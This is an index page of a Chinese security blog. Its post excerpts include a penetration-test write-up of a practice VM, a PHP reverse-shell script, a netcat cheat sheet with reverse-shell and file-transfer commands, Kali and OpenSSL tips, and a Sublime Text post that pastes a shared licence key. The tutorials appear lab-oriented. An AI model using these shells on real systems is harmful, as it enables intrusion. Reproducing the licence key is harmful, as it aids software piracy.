Myluzh Blog

Os-ByteSec靶机渗透测试笔记

2020-3-10 myluzh SECURE

0x01 初步探测 靶机导入虚拟机后,先找到靶机IP,使用netdiscover命令扫描即可。扫到靶机ip192.168.56.101 nmap扫了下靶机开放的端口 0x02 访问网站 那就先从80端口开始下手,访问站点看看有什么内容,主页如下 随后就是dirb扫了下目录,没有什么能利用的东西,然后看了下主页源代码,看到源代码,里面有个提示 #GET#smb#free ,应该是提示我们利用smb。 0x03 步入smb 这边没有思路了,查了下writeup,smbclient语法如下;用户名为smb,密码为空,成功进入 smbclient//ip/myshare -U xxxx 查看了下当前目录文件,main.txt跟safe.zip get命令下载文件 0x04 压缩包爆破 查看main.txt没东西能利用,解压safe.zip发现需要密码,利用fcrackzip进行爆破 fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safezip 密码为hacker1,解压后得到文件secret.jpg,user...

阅读全文>>

评论(0) (1229)

PHP反弹shell

2020-3-6 myluzh PHP

需要传递ip跟port两个参数,ip为攻击机的ip,port为自定义端口 <?php set_time_limit(0); $ip=$_GET['ip'] $port=$_GET['port']; if ($ip == "" and $port == "") { echo "[ip] [port] not defined"; exit(); } $fp = @fsockopen($ip, $port, $errno, $errstr); if (!$fp) { echo "connection timed out"; } else { fputs($fp, "\n++++++++++connect success++++++++\n"); while (!feof($fp)) { fputs($fp, "shell:"); //输出 $shell = fgets($fp); $message = `$shell`; fputs($fp, $message); } ...

阅读全文>>

标签: php 反弹 shell

评论(0) (862)

Netcat基本用法总结

2020-3-6 myluzh NOTE

0x01基础使用 靶机创建一个服务端: nc -nvlp [端口] 攻击机开启监听: nc [服务端IP] [端口] 0x02获取shell 正向shell 靶机创建一个服务端: #Windows nc -nvlp [端口] -e cmd.exe #Linux nc -nvlp [端口] -e /bin/sh 攻击机开启监听: nc [服务端IP] [端口] 反向shell 靶机创建一个服务端: #Windows nc [攻击机IP] [端口] -e cmd.exe #Linux nc [攻击机IP] [端口] -e /bin/sh 攻击机开启监听: nc -nvlp [端口] 有些时候靶机上并没有nc,所以需要php反弹shell来实现,关于php反弹shell脚本 0x03文件传输 靶机创建一个服务端: nc -nvlp [端口] >1.txt 攻击机接受文件: nc [服务端IP] [端口] <1.txt 参考资料: Netcat下载地址:https://eternallybored.org/misc/netcat/ “瑞士军刀”N...

阅读全文>>

评论(0) (903)

Kali Liunx更新源-国内Kali源

2020-3-6 myluzh NOTE

0x01编辑kali的更新源地址文件 sudo vim /etc/apt/sources.list 0x02添加下面的源地址(选择几个增加即可) #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #清华大学 deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-r...

阅读全文>>

标签: kali linux 更新源

评论(0) (782)

Kali Liunx下利用openssl进行md5加密

2020-3-5 myluzh NOTE

0x01 MD5加密 交互式输入 [root@kali ~]# openssl OpenSSL> md5 123456 (stdin)= f447b20a7fcbf53a5d5be013ea0b15af OpenSSL> md5 123456(stdin)= e10adc3949ba59abbe56e057f20f883e #MD5计算时包含了回车符 OpenSSL> [root@kali ~]# [root@kali ~]# openssl OpenSSL> md5 123456(stdin)= e10adc3949ba59abbe56e057f20f883e #输入完后按Crtl+D三次 管道标准输入处理 [root@kali ~]# echo 123456 |openssl md5 #MD5计算时包含了回车符 (stdin)= f447b20a7fcbf53a5d5be013ea0b15af [root@kali ~]# echo -n 123456 |openssl md5 #-n 不带回车符,才是正确的 (stdin)= e10adc3949ba59abbe56e0...

阅读全文>>

标签: kali linux openssl md5 加密

评论(0) (905)

Sublime Text 3 安装 注册 汉化

2020-3-5 myluzh NOTE

0x01安装 进入官网 下载Sublime Text 3 并且安装,官网下载太慢的话可以复制下载链接用迅雷下载。 0x02注册 运行Sublime, 先点击状态栏的help,再点击进入enter lisence ,跳出来一个对话框,把下面的激活码复制进去即可注册。 ----- BEGIN LICENSE ----- Member J2TeaM Single User License EA7E-1011316 D7DA350E 1B8B0760 972F8B60 F3E64036 B9B4E234 F356F38F 0AD1E3B7 0E9C5FAD FA0A2ABE 25F65BD8 D51458E5 3923CE80 87428428 79079A01 AA69F319 A1AF29A4 A684C2DC 0B1583D4 19CBD290 217618CD 5653E0A0 BACE3948 BB2EE45E 422D2C87 DD9AF44B 99C49590 D2DBDEE1 75860FD2 8C8BB2AD B2ECE5A4 EFC08AF2 25A9B86...

阅读全文>>

评论(0) (924)